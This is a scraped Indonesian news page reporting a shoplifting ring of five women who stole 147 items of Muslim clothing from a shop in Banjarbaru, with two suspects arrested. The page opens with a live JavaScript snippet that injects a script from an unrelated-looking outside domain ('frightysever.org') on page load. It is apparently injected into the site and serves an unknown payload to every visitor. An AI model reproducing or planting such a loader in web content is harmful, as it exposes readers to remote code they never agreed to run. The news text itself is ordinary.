(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Komplotan Emak-emak Gasak Ratusan Baju Muslim di Banjarbaru, Terekam CCTV Dibekuk Polisi


KANALKALIMANTAN.COM, BANJARBARU – Komplotan emak-emak tertangkap basah mencuri pakaian di sebuah toko seberang Pasar Bauntung Banjarbaru, Jalan RO Ulin, Kelurahan Loktabat Selatan, Kota Banjarbaru.

Pelaku mencuri beragam baju muslim laki-laki dan perempuan secara berkomplot, melibatkan lima orang yang mana aksi emak-emak itu terekam CCTV toko.

Dalam aksi komplotan emak-emak berhijab itu nampak memilih-milih pakaian layaknya para pembeli, pada Jumat (20/10/2023) pekan lalu.

Baca juga: Tangkap Kelompok Remaja ‘Pasber 027’, Mapolresta Banjarmasin Dipenuhi Karangan Bunga

Dalam rekaman CCTV tanpa disadari para pelaku terlihat memasukkan sejumlah barang curian itu ke kantong plastik yang sudah mereka bawa.

Dua emak-emak pelaku berinisial AB (54) dan MM (44) berhasil diamankan polisi usai pemilik toko melaporkan total kehilangan 147 barang yang diduga dijarah komplotan emak-emak tersebut.

“Total kerugian sebesar Rp16 juta, dimana barang yang dicuri berupa 20 buah gamis laki-laki, 26 gamis perempuan, 34 atasan rajut, 24 daster, 12 buah baju koko, 9 gamis anak, 15 buah atasan biasa dan 7 buah setelan mahkota,” sebut Kapolsek Banjarbaru Utara, Kompol Yopie Andri Haryono, Senin (30/10/2023) malam.

Baca juga: Mark Up Proyek Jalan Desa, Mantan Kades di Kotabaru Dituntut 1 Tahun 9 Bulan Penjara

Kapolsek Banjarbaru Utara menjelaskan, kejadian bermula pada Jumat (20/10/2023) sekitar pukul 13.00 Wita, karyawan melaporkan kepada pemilik toko bahwa ada peristiwa pencurian yang terjadi di tempat mereka bekerja.

Pemilik toko pun langsung memeriksa rekaman CCTV dan menemukan lima orang emak-emak yang melakukan aksi pencurian di tokonya.

Tak berselang lama, pemilik toko menyadari ada satu unit kendaraan roda dua yang terparkir di depan toko tersebut.

Baca juga: Ngaku Terima Wangsit Gaib, Motif Kakek Asal Jateng Sebarkan Ujaran Kebencian di 14 Kota

Setelah diperiksa, ternyata di dalam sepeda motor tersebut tergantung sebuah kantong plastik hitam berisi barang curian komplotan emak-emak yang sebelumnya sempat terekam kamera CCTV.

“Tak berapa lama datang lah pelaku AB ingin mengambil sepeda motor tersebut atas perintah MM yang merupakan pemilik motor tersebut, pemilik toko berhasil mengamankan pelaku dan melaporkan kejadian,” ujar Kapolsek.

Anggota Opsnal Polsek Banjarbaru Utara saat menerima laporan langsung mengumpulkan bukti dan olah TKP, kemudian melakukan pencarian atas keberadaan pelaku MM yang sebelumnya diketahui informasi melalui pelaku AB yang telah tertangkap.

Baca juga: BPBD Banjar: Empat Titik Karhutla Terjadi Hari Ini

“Anggota Opsnal dengan dipimpin oleh Panit 2 Opsnal Aiptu Sugeng Gunawan berhasil mengamankan pelaku MM di rumahnya Kelurahan Basirih Kota Banjarmasin,” ungkap Kapolsek Banjarbaru Utara.

Kepada polisi, dua emak-emak itu mengakui telah mencuri pakaian secara berkelompok dengan teman-temannya saat ini masih dalam pengejaran anggota kepolisian.

“Saat ini anggota masih melakukan pengejaran pelaku lainnya, sementara dua pelaku sudah berada di tahanan Mapolsek Banjarbaru Utara untuk melakukan proses hukum,” pungkasnya.

Para pelaku dijerat hukuman atas tindak pidana pencurian dengan pemberatan sebagaimana dimaksud dalam Pasal 363 ayat 1 ke 4 Kitab Undang-Undang Hukum Pidana. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

31 menit ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

1 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

2 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

6 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

8 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

9 jam ago

This website uses cookies.